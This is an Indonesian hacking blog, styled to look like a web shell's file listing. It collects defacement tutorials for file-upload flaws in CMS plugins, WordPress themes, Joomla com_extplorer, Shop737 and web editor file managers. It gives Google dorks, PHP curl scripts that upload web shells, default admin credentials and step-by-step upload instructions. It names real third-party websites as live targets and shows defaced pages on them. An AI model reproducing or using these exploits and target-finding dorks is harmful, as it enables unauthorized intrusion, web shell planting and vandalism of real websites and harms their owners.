UCI
Private Blog
System OS :Linux server.google.com 2.6.32-431.5.1.el6.x86_64 #1 SMP Wed Feb 12 00:41:43 UTC 2014 x86_64
today : | at : | safemode : ON
> / home / facebook / twitter / exit /
name author perms com modified label
Tampilkan postingan dengan label Remote File. Tampilkan semua postingan
Tampilkan postingan dengan label Remote File. Tampilkan semua postingan

deface dengan "CMS admin Image Uploader" Shell Upload Vulnerability Fahmi J rwxr-xr-x 0 09.21

Filename deface dengan "CMS admin Image Uploader" Shell Upload Vulnerability
Permission rw-r--r--
Author Fahmi J
Date and Time 09.21
Label
Action
"CMS admin Image Uploader" Shell Upload Vulnerability


Google Dorks:
inurl: "default_image.asp"
inurl: "default_imagen.asp"
inurl: "/ box_image.htm"

Anda akan mendapat pilihan unggah setelah mengklik link yang Anda punya dengan menggunakan Dorks.
Sekarang pilih deface Anda, atau shell dan upload Big Grin
Format:
shell.asp,. jpg, shell.php;.. html php jpg, gif, jpg, png, pdf, zip......

Anda dapat menggunakan data Tamper juga ...

Live Demo:
http://www.pballcentral.com/admin% 5Cincl ... _image.asp


=====================================================

[#] Wordpress ..... brainstorming meng-upload shell [#]
permintaan:

1 º Shell: THA.php di tempat yang sama
2 º Buat file: inject.php (Jalankan secara online atau dengan xampp)

PHP code:
<?php
$uploadfile="THA.php";
$ch = curl_init("http://target.com/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

Google Dork:
inurl :/ wp-content/themes/brainstorm / situs:


Contoh target tanpa link edit:
http://www.kscm.ie/wp-content/themes/bra...?post_id=9

diubah:
/ wp-content/themes/brainstorm/scripts/piecemaker/piecemaker-xml.php? post_id = 9
untuk
/ wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php


Contoh Jumlah:
http://www.kscm.ie/wp-content/themes/bra...oadify.php

cari u shell di sini:
http://target/wp-content/uploads/year/month/THA.php

contoh
http://www.kscm.ie/wp-content/uploads/2013/08/THA.php

====================================================

WordPress GeoPlaces Themes (Upload shell exploit)

# Exploit Title: WordPress GeoPlaces Themes >> upload shell exploit
# Google Dork: "inurl:wp-content/themes/GeoPlaces/"
# Date: 2/6/2013
# Exploit Author: xmayaroos
# Vendor Homepage: http://www.geotheme.com/
# Version: [app version - REQUIRED]
# Tested on: [relevant os]
# Greeting To : sec4ever members

/wp-content/themes/GeoPlaces/monetize/upload/

find your shell

/wp-content/uploads/2013/08 (Year / Month)


===================================================

Joomla com_extplorer Components shell upload Vulnerability
#################################

# ISlamic Republic Of Iran Security Team

# http://Www.IrIsT.Ir

#################################

# Exploit Title : joomla com_extplorer Components shell upload Vulnerability

# Author : IrIsT Security & Researcher Team

# Discovered By : Am!r

# Home : http://IrIsT.Ir - http://IrIsT.Ir/forum

# Facebook Page : http://www.facebook.com/pages/IrIsT-Hack...7267857573

# Software Link : http://www.joomla.org

# Security Risk : High

# Tested on : Linux

# Dork : inurl:administrator/components/com_extplorer

#################################
Exploit :

Post.php

<?php

$uploadfile="Amir.php.gif";

$ch =
curl_init("http://www.exemple.com/administrator/components/com_extplorer/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/images/stories/Amir.php.gif

#################################

# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0

# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous

# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv - soulz

# & All Members In IrIsT.Ir

#################################

#Tnx To : PacketstormSecurity.Org - 1337day.com - exploit-db.com

#################################


=============================================

Dork : allinurl:index.php?db=information_schema


Go to google.com and enter this dork, google will show you About 161,000 results guess how many website are vulnerable for this attack !


This dork bypasses the admin username and pass and takes You directly to information schema tables to get data and You can delete data!!!!
===================================================

Wordpress theme GTD File Upload Vulnerability. #Google Dork: inurl:"/wp-content/themes/GTD/upload/" or allintext:"powered by WordPress. GTD theme by Templatic"

[+]exploit
-----------------------------------------------------------------------
example : http://localhost/wp-content/themes/GTD/upload/

Shell access: http://localhost/wp-content/themes/GTD/attachments/yourshell.php

Enjoy Brothers!


Translate sendiri !
Gue cuman share aja XD
Kalo dah dewo jangan lupa temen :D
Titip nick ./Shanjunisme98

Sumber : Exploit DB

Deface dengan teknik Shop 373 Fahmi J rwxr-xr-x 0 09.15

Filename Deface dengan teknik Shop 373
Permission rw-r--r--
Author Fahmi J
Date and Time 09.15
Label
Action
Assalamu'alaikum
Oke, kali ini saya akan share salah satu teknik deface dengan Exploit Shop737 File Upload Vulnerability. Maaf kalo judulnya salah. Itu cuma ngarang sendiri. Soalnya sumber awal yang jadi refrensi saya juga bingung dikasih judul apa.
Oke langsung saja.
Bahan :

1. Google Dork : intext:"Powered by Shop737"  <- Use your brain ! Dork silahkan dikembangkan sendiri. :p
2. File berformat .txt

Langkah-langkah :
1. Langsung saja berselancar di google.com dengan dork diatas. lalu pilih salah satu web. Sebagai contoh saya pilih http://balimalio.com/poto/
2. Masukkan exploitnya. site/poto/upload.php . Jadi untuk contoh menjadi http://balimalio.com/poto/upload.php
3. nanti jika suruh memasukkan password sama username isi saja :
User : admin
Password : admin
4. Maka akan masuk ke tempat uploadnya.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDgwhl_an1TwYBkL7HfvUGuR4wA3F1QCvpIsTOlh2tsJwQF9cnoOHbrIMovtfuh8WQSgkVeQuRzorjCWAzDV0KTSEqchtZLuiPL9uI0ddDHMuXgPn9Csdvp6RbVV67y8GSDf9Es-3zLjWO/s320/737-1.png

Oke, tinggal diisi. Form atas untuk membuat kategori baru. Untuk contoh saya buat kategori baru dengan nama jcvan . Lalu klik buat kategori.
Upload ke : pilih folder tempat file akan diupload. Untuk contoh saya upload ke folder yang tadi saya buat yaitu ke folder jcvan .
File yang diupload : klik pilih berkas dan upload file berformat jpg atau txt
Lalu klik Upload di paling bawah.
5. Jika upload sudah selesai, sekarang kita panggil filenya. letaknya ada di site/poto/[folder]/file.txt
Maka file saya akan berada di http://balimalio.com/poto/jcvan/jj.txt


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjijK9c1Vi6Gm52N0Uvql9i428lWE2SlVnyOh-IvX-ERWrC0zGiXYzxQd9YDdKopHwNRYQe4dRIVv7dwtCi3vxVQ_YH8DTGLau7yJpcEoK0BrWjdNhwxlUV5VLfftj0FGhAGlZeUMRh3MXN/s320/jeje.png


Uploaded by Newbie_Inside .
I Love You Jessica Vania. :*
Problem ??

Sekian tutorial kali ini. Semoga bermanfaat.
Refrensi : IDCA

Deface dengan teknik Ajax File Manager | File Upload Vulnerability Fahmi J rwxr-xr-x 0 09.13

Filename Deface dengan teknik Ajax File Manager | File Upload Vulnerability
Permission rw-r--r--
Author Fahmi J
Date and Time 09.13
Label
Action
Assalamu'alaikum

Kali ini saya akan share cara deface dengan exploit Ajax File Manager | File Upload Vulnerability. Exploitnya sangat mudah dipraktekkan. Cocok bagi newbie yang baru belajar deface. :) .
Oke, langsung saja kita mulai. Hehehehehe.
. Dork :
inurl:"ajaxfilemanager.php?page=" intitle:"ajax file manager" (kembangkan sendiri)
. File berekstensi .txt

Langkah Langkah :
1. Mulai cari target di google dengan dork diatas. :)
Sebagai contoh, saya pilih http://www.szfo-redcross.ru/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?page=22

2. Lalu klik tombol upload di pojok kanan atas.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl7s9HG7mRQSp4sz_y7CxeYFDkHUwXvo6TpbuOToy_LKAT5AvH9e6wdQ3TvvOlS1CMF0XwYXk6HnMK8KMxuZU_v0TeVfGFmMi08Zw8FDTjc9Md8rRu-fC3dGpxqVTT8eedw3A7uBkGTwWF/s320/step1.png

3. Kemudian upload file sobat. File harus berekstensi .txt . Sebaagi contoh, saya menguplaod filedengan nama jeje.txt

4. Jika sudah, klik file yang tadi sobat upload.

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNkut5ZDknAbDq6OZSoy5ELNGQhJpPM4dr1BtW0cNSIQ5NwTBBNQezmnCX3aipIgnP8cOtsTUegrabkP4EO2gvJirVoN40YSXbDuW_OTdWXEfgkacrPXfAWuYw3BaR7GwJ7TQAVAkxkiI4/s1600/step2.png


5. Akan terbuka link dimana file sobat berada. :)

http://www.szfo-redcross.ru/tiny_mce/plugins/uploaded/jeje.txt


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9Yyj6p6fZrYnyoV-2HFY7O1bHrZ1ZfluK8cbkFG4AUJryK2K9OGwbqfdvzhFzoCH5w-jCUsltmlWLRcjs2nxDJd1RBI8FSs6XvMqMkggq2VWVfOJlsoQuadVeY3J167hZrGgd6z2wXPCc/s320/step3.png

Sekian tutorial kali ini. Semoga bermanfaat. :)

Source : Madura Cyber

Deface dengan CMS Webconstructor File Upload Vulnerability Fahmi J rwxr-xr-x 0 09.11

Filename Deface dengan CMS Webconstructor File Upload Vulnerability
Permission rw-r--r--
Author Fahmi J
Date and Time 09.11
Label
Action
Assalamu'alaikum

Kali ini saya akan share teknik deface yang kemarin saya dapat dari bang ENno. Tekniknya cukup mudah terutama bagi yang newbie culun seperti saya. :v

Oke, langsung saja.
Bahan :

  • Google Dork : inurl:tiny_mce/plugins/filemanager [untuk dork lain silahkan dikembangkan sendiri]
  • Exploit : [localhost]/PATH/tiny_mce/plugins/filemanager/insertfile/insert_file.php

Sekarang kita mulai prakteknya.

  1. Buka google dan cari target dengan dork diatas.
  2. Sebagai contoh saya pilih http://rofel.pl/tiny_mce/plugins/filemanager/
  3. masukkan exploitnya sehingga menjadi http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
  4. Upload filenya. Sebagai contoh saya upload file dengan nama suram.html
  5. Jika upload sukses, maka kalian akan melihat alamat filenya di bawah. Yaitu di http://rofel.pl/upload/suram.html
  6. Dan sekarang, foto nabilahJKT48 sudah terpasang di web tersebut. :v
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwoU0tcs02V-Hq15OJvUVbclNsS2m0dYv_TJnwQ9n6xZfUYy3eUBfcZ7gYuyBRXsXP3Hf9a1mD-PDq0Ty0NG1ePkZx7Mjnu9AKya0spQnYx0nq_56GolACy2W_NPBfNu5A6c0nisezoJte/s320/JKT48.png


Ekstensi file yang adpat diupload adalah html, pdf, txt, doc, jpg . Tidak support file .php sehingga tidak bisa upload shell.
CMS Webconstructor File Upload Vulnerability
Thanks to : ENNo Area

Hasil ane http://www.steulaliegites.com/tinymce/jscripts/tiny_mce/plugins/filemanager/files/~cddorg.html

Sumber : Madura Cyber

Deface dengan teknik Remote File Upload Vulnerability (RFUEV) Fahmi J rwxr-xr-x 0 09.08

Filename Deface dengan teknik Remote File Upload Vulnerability (RFUEV)
Permission rw-r--r--
Author Fahmi J
Date and Time 09.08
Label
Action
Ok, daripada lama-lama cerita, mending kita langsung aja ketutorialnya sob, Berikut Tutorial Deface dengan Teknik Remote File Upload Exploit Vulnerability :
Live Target : http://imobiliariaresende.com/editor/editor/filemanager/browser/mcpuk/images/icons/32/

Dork :
inurl:/editor/editor/filemanager/
inurl:/HTMLEditor/editor/"

1). Masukan salah satu dork diatas ke Seacrh Enginee Google.


2). Pilih salah satu website sebagai target.


3). Tampilan Webitenya nanti akan seperti ini.
http://prntscr.com/1ilcho

4). Kemudian kode ini :

editor/editor/filemanager/browser/mcpuk/images/icons/32/

5). Ganti dengan kode ini, Lalu enter :

editor/editor/filemanager/upload/test.html




6). Jika sudah, kamu ubah pada Select the "File Uploader" to use: Ubah dari ASP menjadi PHP.

7). Kemudian kamu klik Choose File, kamu pilih salah satu file HTML deface'an kamu.


8). Lalu klik Send it to the Server.


9). Jika berhasil nanti akan muncul notice jika file yang kamu upload berhasil tanpa eror, dan pada kotak ( Upload File URL ) akan memberikan patch dimana file kamu berada.


10). Copykan saja file yang ada di ( Upload File URL ) lalu taruh dibelakang site target, jadi nanti akan terlihat seperti ini :
http://www.buraevo.ru/UserFiles/_____.html

http://imobiliariaresende.com/editor/images/__.html

Ingat ya nick ane Mr.Router87... 

Sumber : Cirebon Cyber 4rt
 

Sh0uT0u7 © 2010 United Cyberspace of Indonesian